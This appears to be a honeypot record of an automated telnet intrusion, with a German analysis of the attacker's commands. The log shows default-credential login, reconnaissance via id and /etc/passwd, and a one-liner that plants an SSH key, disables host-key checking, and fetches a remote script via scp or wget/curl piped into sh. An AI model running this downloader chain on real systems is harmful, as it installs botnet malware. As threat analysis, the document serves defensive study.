01.10.2026, 11:49 UTC · 16 Befehle · über telnet · Singapur
user='admin' pass='admin' admin@srv01:~$ id uid=1000(admin) gid=1000(admin) groups=1000(admin) admin@srv01:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" auth_ok admin@srv01:~$ enable enable: command not found admin@srv01:~$ system system: command not found admin@srv01:~$ shell shell: command not found admin@srv01:~$ sh admin@srv01:~$ bash admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- bash: syntax error near unexpected token `||' '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no bash: syntax error near unexpected token `newline' 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\… bash: syntax error near unexpected token `newline' '>' 'chmod' '400' 'key.ppk;' 'scp' '-s' '-F' 'sshcfg' '-i' 'key.ppk' '[E-Mail]:sh' 'out_sh;' 'if' '[' '$?' '-eq' '0' ']' 'then' 'chmod' '+x' 'out_sh;' 'sh' 'out_sh' 'telnet' '>' '/dev/null' '2>&1;' 'else' '(wget' '--no-check-certificate' '-qO-' 'https://[IP]/sh' '||' 'curl' '-sk' 'https://[IP]/sh)' '|' 'sh' '-s' 'telnet;' 'fi;' 'rm' '-rf' 'sshcfg' 'key.ppk' 'out_sh;' 'echo' '-e' '\x72\x65\x64\x74\x61\x69\x6c\x5f\x62\x6f\x74\x5f\x74\x65\x6c\x6e\x65 redtail_bot_telnet_ok
Der Angreifer meldete sich mit Standardzugangsdaten über Telnet an. Er führte erste Reconnaissance-Befehle aus, um die Benutzeridentität und die Liste der Systemkonten zu prüfen. Anschließend versuchte er, in eine tiefere Shell-Ebene zu wechseln und wechselte in temporäre Verzeichnisse. Dort deponierte er einen SSH-Schlüssel und eine Konfigurationsdatei, um eine verschlüsselte Verbindung zu einem externen Server aufzubauen. Alternativ lud er ein Skript über HTTP oder HTTPS herunter und führte es direkt im Speicher aus.
Die Befehle id und cat /etc/passwd dienen der Aufklärung des Systems und der Benutzerrechte. Der Befehl echo -e mit Hexadezimalwerten schreibt die Zeichenkette auth_ok in die Ausgabe, was als Bestätigung oder Trigger für den Angreifer dienen kann. Die Sequenz enable, system, shell und sh versucht, verschiedene Shell-Interpreten zu starten, um maximale Kompatibilität mit unterschiedlichen Firmware-Varianten zu gewährleisten. Der lange Befehl speichert einen OpenSSH-Privatschlüssel in einer Datei, konfiguriert SSH so, dass Host-Prüfungen übersprungen werden, und versucht dann, eine Datei namens out_sh über SCP zu übertragen. Falls SCP fehlschlägt, wird ein Skript von einer externen IP-Adresse über wget oder curl geladen und sofort ausgeführt, wobei der Parameter telnet als Argument übergeben wird.
Das Ziel war vermutlich die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten Gerät. Die Verwendung eines vorab generierten SSH-Schlüssels deutet auf eine persistente Fernzugriffsmöglichkeit hin, die auch bei Neustarts oder geänderten Passwörtern funktionieren soll. Das Herunterladen eines Skripts dient der Nachladung von Payloads, was typisch für Kryptomining oder DDoS-Botnetze ist.
Dieses Vorgehen ist ein sehr verbreitetes Muster bei automatisierten Botnet-Würmern, die auf IoT-Geräte mit schwachen Passwörtern zielen. Die Kombination aus Standard-Passwort-Brute-Force und dem automatisierten Nachladen von Payloads ist charakteristisch für Masseninfektionen.